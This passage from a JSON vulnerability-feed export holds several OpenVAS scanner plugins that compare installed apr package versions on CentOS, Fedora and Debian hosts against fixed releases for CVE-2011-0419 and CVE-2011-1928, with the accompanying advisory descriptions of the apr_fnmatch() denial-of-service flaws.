"cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:881265", "href": "http://plugins.openvas.org/nasl.php?oid=881265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n \n Note: This problem affected httpd configurations using the "Location"\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation; it did not specifically require a\n malicious HTTP request.\n \n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\n\ntag_affected = \"apr on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017593.html\");\n script_id(881265);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:13:40 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0844\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos5 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for apr CESA-2011:0844 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880491", "href": "http://plugins.openvas.org/nasl.php?oid=880491", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for apr CESA-2011:0844 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache Portable Runtime (APR) is a portability library used by the\n Apache HTTP Server and other projects. It provides a free library of C data\n structures and routines.\n\n The fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\n infinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\n matching flag was used. A remote attacker could possibly use this flaw to\n cause a denial of service on an application using the apr_fnmatch()\n function. (CVE-2011-1928)\n \n Note: This problem affected httpd configurations using the "Location"\n directive with wildcard URLs. The denial of service could have been\n triggered during normal operation; it did not specifically require a\n malicious HTTP request.\n \n This update also addresses additional problems introduced by the rewrite of\n the apr_fnmatch() function, which was necessary to address the\n CVE-2011-0419 flaw.\n \n All apr users should upgrade to these updated packages, which contain a\n backported patch to correct this issue. Applications using the apr library,\n such as httpd, must be restarted for this update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apr on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-May/017594.html\");\n script_id(880491);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"CESA\", value: \"2011:0844\");\n script_cve_id(\"CVE-2011-1928\", \"CVE-2011-0419\");\n script_name(\"CentOS Update for apr CESA-2011:0844 centos5 i386\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-devel\", rpm:\"apr-devel~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apr-docs\", rpm:\"apr-docs~1.2.7~11.el5_6.5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:40", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-07-12T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-6750", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863252", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-6750\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061125.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863252\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-12 08:00:26 +0200 (Tue, 12 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2011-6750\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-6750\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apr'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"apr on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:55:34", "description": "The remote host is missing an update to apr\nannounced via advisory DSA 2237-2.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2237-2 (apr)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69737", "href": "http://plugins.openvas.org/nasl.php?oid=69737", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2237_2.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2237-2 (apr)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The recent APR update DSA-2237-1 introduced a regression that could\nlead to an endless loop in the apr_fnmatch() function, causing a\ndenial of service. This update fixes this problem (CVE-2011-1928).\n\nFor reference, the description of the original DSA, which fixed\nCVE-2011-0419:\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny4.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze2.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.5-1.\n\nFor the unstable distribution (sid), this problem will be fixed in\nversion 1.4.5-1.\n\nWe recommend that you upgrade your apr packages and restart the\";\ntag_summary = \"The remote host is missing an update to apr\nannounced via advisory DSA 2237-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202237-2\";\n\n\nif(description)\n{\n script_id(69737);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Debian Security Advisory DSA 2237-2 (apr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.2.12-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.2.12-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.2.12-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.2-6+squeeze2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1\", ver:\"1.4.5-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dbg\", ver:\"1.4.5-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr1-dev\", ver:\"1.4.5-1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:19", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-7340", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863121", "href": "http://plugins.openvas.org/nasl.php?oid=863121", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-7340\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"apr on Fedora 13\";\ntag_insight = \"The mission of the Apache Portable Runtime (APR) is to provide a\n free library of C data structures and routines, forming a system\n portability layer to as many operating systems as possible,\n including Unices, MS Win32, BeOS and OS/2.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061183.html\");\n script_id(863121);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-7340\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-7340\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC13\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc13\", rls:\"FC13\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:54", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-06-06T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-6918", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863124", "href": "http://plugins.openvas.org/nasl.php?oid=863124", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-6918\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"apr on Fedora 14\";\ntag_insight = \"The mission of the Apache Portable Runtime (APR) is to provide a\n free library of C data structures and routines, forming a system\n portability layer to as many operating systems as possible,\n including Unices, MS Win32, BeOS and OS/2.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061177.html\");\n script_id(863124);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-06 16:56:27 +0200 (Mon, 06 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-6918\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-6918\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:52", "description": "Check for the Version of apr", "cvss3": {}, "published": "2011-07-12T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2011-6750", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863252", "href": "http://plugins.openvas.org/nasl.php?oid=863252", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2011-6750\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"apr on Fedora 15\";\ntag_insight = \"The mission of the Apache Portable Runtime (APR) is to provide a\n free library of C data structures and routines, forming a system\n portability layer to as many operating systems as possible,\n including Unices, MS Win32, BeOS and OS/2.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061125.html\");\n script_id(863252);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-12 08:00:26 +0200 (Tue, 12 Jul 2011)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-6750\");\n script_cve_id(\"CVE-2011-0419\", \"CVE-2011-1928\");\n script_name(\"Fedora Update for apr FEDORA-2011-6750\");\n\n script_summary(\"Check for the Version of apr\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"apr\", rpm:\"apr~1.4.5~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-03T10:57:44", "description": "Check for the Version of apr", "cvss3": {}, "published": "2012-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for apr FEDORA-2012-1656", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2012-0840"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:863756", "href": "http://plugins.openvas.org/nasl.php?oid=863756", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apr FEDORA-2012-1656\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"apr on Fedora 15\";\ntag_insight = \"The mission of the Apache Portable Runtime (APR) is to provide a\n free library of C data structures and routines, forming a system\n portability layer to as many operating systems as possible,\n including Unices, MS Win32, BeOS and OS/2.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-March/074140.html\");\n script_id(863756);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-07 